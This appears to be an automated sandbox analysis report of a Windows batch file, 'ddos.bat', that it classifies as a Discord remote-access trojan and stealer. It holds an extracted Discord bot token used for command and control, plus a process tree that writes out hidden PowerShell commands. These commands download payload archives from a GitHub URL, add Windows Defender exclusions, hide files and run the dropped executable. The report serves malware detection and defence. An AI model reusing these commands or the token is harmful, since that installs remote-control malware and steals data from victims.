Overview

overview

10

Static

static

1

ddos.bat

windows7-x64

8

ddos.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2024 22:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ddos.bat

  • Size

    1KB

  • MD5

    15ee8aecfc89d8bed8f362cb46e4b8bb

  • SHA1

    c39b884897d73006daa07d29264670d181835624

  • SHA256

    7af1c25851ef3f66cbca82540d35470de8a364a469d00a013891bd211f56e082

  • SHA512

    553a78c7e82669145767747c287244c2e253a938f7379feaf71425e5f4eeedc612157f812d7d723c3edc57d6f534f152714f173e3b10e55331b16b8f741a3b66

Score
10/10
discordratexecutionpersistenceratrootkitstealer

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTI5Njg5NDEwMjY0NTkwMzQwMA.GbbBFh.ZTr18FyMmzROaUjB4OeMEYamtttj4Hm8E7t2kA

  • server_id

    1293738586679672945

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

    stealerrootkitratpersistencediscordrat
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -window hidden -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3016
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:4484
      • C:\Windows\system32\attrib.exe
        attrib +h "Anon" /s /d
        2⤵
        • Views/modifies file attributes
        PID:3120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2088
      • C:\Windows\system32\tar.exe
        tar -xf 1.zip
        2⤵
          PID:4872
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\1.bat"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4772
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -window hidden -command ""
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2108
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1876
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3000
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\2.bat"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -window hidden -command ""
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1320
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Powershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/Discord.zip' -OutFile Discord.zip"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4612
            • C:\Windows\system32\tar.exe
              tar -xf Discord.zip
              4⤵
                PID:3720
              • C:\Users\Admin\AppData\Local\Anon\Discord.exe
                Discord.exe
                4⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1492
              • C:\Windows\system32\attrib.exe
                attrib +h "C:\Users\Admin\AppData\Local\Anon\Discord.exe" /s /d
                4⤵
                • Views/modifies file attributes
                PID:2824

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Anon\1.bat
          Filesize

          268B

          MD5

          cdb8a5fcca6c6b2ac156c95610dd62b0

          SHA1

          fc9143fbdfc511193d627682d03da517ef03eac0

          SHA256

          c99e311f09fdc9a371c67971575f59962dc1d5bb02afdcff72d74d0b3ede34df

          SHA512

          b1eded36047153fe99fb8fe4e29667d6aefe3431d1de1669f364fa185584bf6fbfff5cd7f10bc7a56f9f055e350276ac4219e737836873b5c542927c317814f9

          Download Submit

        • C:\Users\Admin\AppData\Local\Anon\1.zip
          Filesize

          661B

          MD5

          15af212f6b388a57510af30146ea51f8

          SHA1

          9833f92d882d8e69bd453bdb2f3feda15d961c0f

          SHA256

          62b1f7ab4fcf8a68f31afd384c8d1f1d46124991e1d5d19ea04eece62a63a897

          SHA512

          90614fcb1c43df3d46c5d76bfcb777f9a276507e9a6a6a59d5e248e9de04b681656b5417e84758a78848580ca252c1ab07509102c924d2c67a42f419f294ea05

          Download Submit

        • C:\Users\Admin\AppData\Local\Anon\2.bat
          Filesize

          327B

          MD5

          9cbac74f137243a22af973eacd90de31

          SHA1

          3260ea401134322fe037a35b685c66a0793c3658

          SHA256

          567296eeadb0e5463e11abc4f05b6617d72944a382d0202cb0cc6954d2a17465

          SHA512

          e729d873c6fd9af96092831ad7efc1fb5deca094fd48a4cc3874ce0c7a6814f97bb7c737393d1755b495dfd91791206d7ba6f8c8d51150ccf698f49627a23e60

          Download Submit

        • C:\Users\Admin\AppData\Local\Anon\Discord.exe
          Filesize

          51KB

          MD5

          85bced49019c64cbc712ff6e6f14a128

          SHA1

          969c4ca9c1176e06cda1139ef2f1ab3187c0af6c

          SHA256

          d98e1114aaa82b82b670977f156c649b6a242556024e9071b2606ee2e921c5de

          SHA512

          1cceaa34890c95038adbebf83b59b5e8ea04464f5559c9ae2d10484aaa39fe40a25c002bb2b01947593d70aef7a6bc3be03e9ca64eb9ccba860eaddc54149834

          Download Submit

        • C:\Users\Admin\AppData\Local\Anon\Discord.zip
          Filesize

          45KB

          MD5

          6daf7b41d40c684fc329ddeaa10e8a70

          SHA1

          7869289c6b91ce199aa69ade7c9bcc973cb60b2c

          SHA256

          df78cfcaa08580827f47fcffc59c133e77ccdbe893817cfa28cb519ec5826927

          SHA512

          b9fcabe209f08c9de6b1f01cc33d28909d9e4912d061858236771e6c58822b2021cfeb0ddb94900111a34e19b7adff3d54039857b2662c9e8d0b041377282915

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          5caad758326454b5788ec35315c4c304

          SHA1

          3aef8dba8042662a7fcf97e51047dc636b4d4724

          SHA256

          83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

          SHA512

          4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          1dffbab5ecc6d06e8b259ad505a0dc2a

          SHA1

          0938ec61e4af55d7ee9d12708fdc55c72ccb090c

          SHA256

          a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

          SHA512

          93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          b16dc67d8633fb86f9d9dc491097150e

          SHA1

          0ea564df2675c5e2a82449530dd070ad855dfcd6

          SHA256

          378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b

          SHA512

          c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          96ff1ee586a153b4e7ce8661cabc0442

          SHA1

          140d4ff1840cb40601489f3826954386af612136

          SHA256

          0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

          SHA512

          3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          a7cc007980e419d553568a106210549a

          SHA1

          c03099706b75071f36c3962fcc60a22f197711e0

          SHA256

          a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

          SHA512

          b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          dcfe1f94aa15e3ca618b4c5002c9c055

          SHA1

          b8abdaf68684bc49756086840035b93f79329892

          SHA256

          cf11bfe8cd92fd4293ae0bd884f2c3d397e68d54ea03352027ed6b6c93e8630d

          SHA512

          bce3736f22af50ef73c7ca17942eebddc00ea5b216fa9ad8c704fb6b5c0cc8d0b8aa992fc47270148c23d8257ba2ab9cae079ca239abebef7a92182941f8a73c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1smrnc5.pqk.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/1320-82-0x000001D8700D0000-0x000001D8702EC000-memory.dmp

          Filesize

          2.1MB

          Download

        • memory/1492-100-0x00000235881C0000-0x00000235881D2000-memory.dmp

          Filesize

          72KB

          Download

        • memory/1492-104-0x00000235A2910000-0x00000235A2AB9000-memory.dmp

          Filesize

          1.7MB

          Download

        • memory/1492-103-0x00000235A31E0000-0x00000235A3708000-memory.dmp

          Filesize

          5.2MB

          Download

        • memory/1492-102-0x00000235A2AE0000-0x00000235A2CA2000-memory.dmp

          Filesize

          1.8MB

          Download

        • memory/1492-101-0x0000023588580000-0x0000023588598000-memory.dmp

          Filesize

          96KB

          Download

        • memory/2088-27-0x00007FFB29BC0000-0x00007FFB2A681000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2088-32-0x00007FFB29BC0000-0x00007FFB2A681000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2088-26-0x00007FFB29BC0000-0x00007FFB2A681000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2088-28-0x00007FFB29BC0000-0x00007FFB2A681000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3016-15-0x00007FFB29E60000-0x00007FFB2A921000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3016-6-0x00000212F4C60000-0x00000212F4C82000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3016-0-0x00007FFB29E63000-0x00007FFB29E65000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3016-11-0x00007FFB29E60000-0x00007FFB2A921000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3016-12-0x00007FFB29E60000-0x00007FFB2A921000-memory.dmp

          Filesize

          10.8MB

          Download